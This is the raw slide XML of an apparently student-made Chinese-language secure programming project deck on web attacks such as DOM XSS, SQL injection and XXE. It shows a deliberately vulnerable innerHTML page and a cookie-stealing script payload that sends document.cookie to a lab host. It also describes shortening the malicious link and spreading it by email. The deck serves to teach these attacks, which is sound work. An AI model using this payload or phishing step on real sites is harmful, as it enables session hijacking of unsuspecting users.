                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="A71D5D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>var</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> name = </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>url.searchParams.get</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="DF5000"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>'name’</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>);</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW"/>
                  <a:t>		</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>document.getElementById</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="DF5000"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>'name'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>).</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>innerHTML</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>= </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="DF5000"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-TW" altLang="en-US">
                    <a:solidFill>
                      <a:srgbClr val="DF5000"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>嗨，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="DF5000"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-TW" altLang="en-US">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>+ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>name; </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>	&lt;/script&gt; </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>&lt;/html&gt;</a:t>
                </a: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03FA9D9-D3B5-E272-F112-52AAA9B9D08E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4988689" y="3914018"/>
                <a:ext cx="6099858" cy="536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TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>假如有個網站透過</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>GET</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>的方式接受使用者傳遞的參數，而他的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>html</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>與</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike" err="1">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>javascript</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>如下</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>:</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="333333"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="-apple-syste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276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AEF674-086B-BB7E-8A9B-50E63FE0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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>的弱點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346D8A-93B3-6E76-F885-993B2ABB8D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575893" y="1906336"/>
            <a:ext cx="1077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TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>http://127.0.0.1/domxss.html?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike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en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>=alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>商東峻在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>XSS’)&gt;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EED7C6-9786-5CCF-3FB3-FF4EA1D3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3" y="2415113"/>
            <a:ext cx="9599271" cy="182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5470AFB-633C-09C9-DCC1-AD09A6338E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5015724" y="4283336"/>
            <a:ext cx="7045097" cy="2783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effectLst/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>	&lt;h1 id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'name'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>&gt;Hello&lt;/h1&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>		var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> URL(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>url.searchParams.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'name’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'name'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>嗨，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>name; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>	&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst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8070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3140C7-9BAE-C1EA-7DBD-7970C451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7817F5-DF46-C485-1DFB-9A838BCF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00206"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系統架構與資料庫設計</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>UNION attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>DOM XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>XXE Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>任意檔案上傳</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>DNS Spoofing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C437BF-3510-EFF5-D5B0-6506565A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786" y="1904765"/>
            <a:ext cx="3817021" cy="487593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C52E3B3-8287-1C6E-1114-F1588ED21FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499568" y="5949705"/>
            <a:ext cx="2294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sz="2400"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t>講解影片</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t>共 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/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269961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D3DCE-2A0A-F04B-44C5-83291525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r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中的攻擊點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1E20D7-E91E-F529-64CF-908742D5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82" y="1816443"/>
            <a:ext cx="9064682" cy="5041557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024DC722-D8F5-70E4-6163-633BD0C8D8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3262184" y="3429000"/>
            <a:ext cx="5189838" cy="98236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79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D3DCE-2A0A-F04B-44C5-83291525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r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中的攻擊點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46A325-26C3-0A99-B211-07655D0C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728" y="1972995"/>
            <a:ext cx="8757948" cy="4403092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36DB9612-68D2-78C4-DBC9-53B07C067FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989438" y="4677032"/>
            <a:ext cx="1767016" cy="57459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27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B8522C-80B9-315F-7C05-C4536EAB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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>準備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>攻擊者開啟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>SERVER)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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758C31C7-F89F-9C25-18C0-AA7DB6CDD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962" y="2428972"/>
            <a:ext cx="8982075" cy="3181350"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711330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70960-E1B7-3A58-378E-B74D372D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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>準備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>攻擊者開啟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>SERVER)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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D9A74630-CAAB-2B82-4661-04A964BF0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062" y="2714940"/>
            <a:ext cx="8749876" cy="288720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21E6D22-DE36-CA0A-9A81-D7E6B3991341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1721062" y="2106593"/>
            <a:ext cx="4849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400"/>
              <a:t>參考作業蒐集使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="240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FEED7BD-B2CF-5829-E0AD-EBBFADBA2735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554891" y="4683210"/>
            <a:ext cx="90822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70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26146F-544B-855C-E592-C5F984D0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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>準備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>將函攻擊的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>縮成短網址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7CC639-C75E-F4F4-3A89-3E73AEB5DEDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="1859340"/>
            <a:ext cx="101954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將含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的網址縮成短網址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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http://10.51.50.5/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>product_search.php?search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;document.location="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.51.51.31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dom_xss.php?cookie="+document.cookie;&lt;/script&gt;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並將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>短網址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>藉由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>散播出去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5D3F3FC-D0F1-F519-B691-3D55C77F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497" y="3041728"/>
            <a:ext cx="5076013" cy="38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23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21570-26DA-291C-6A31-09A70B12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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>影片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2E8818-0693-BCD8-9B20-EA56E7EFC319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3057316" y="575901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https://youtu.be/5aBLsF7vhIU</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="線上媒體 4" descr="安全程式設計-期末專案-DOM XSS">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5ABBC57-C34A-2998-8E75-8681FAFC19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57316" y="2104756"/>
            <a:ext cx="6077367" cy="34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6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ED2CB1E-FDA4-0D51-0D40-E9712376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XXE Injection</a:t>
            </a:r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97A732-5D33-D7D8-7A9B-E7381DD67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/>
              <a:t>XML External Entity Injection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196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6176B03-2CC8-9E65-AF07-FF6E28A1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/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>是什麼？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94A19E-4A35-3E0F-8C0C-66243AC01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標記式語言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>有別於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>是用來表現資料，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>用來說明資料與攜帶資料的資訊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
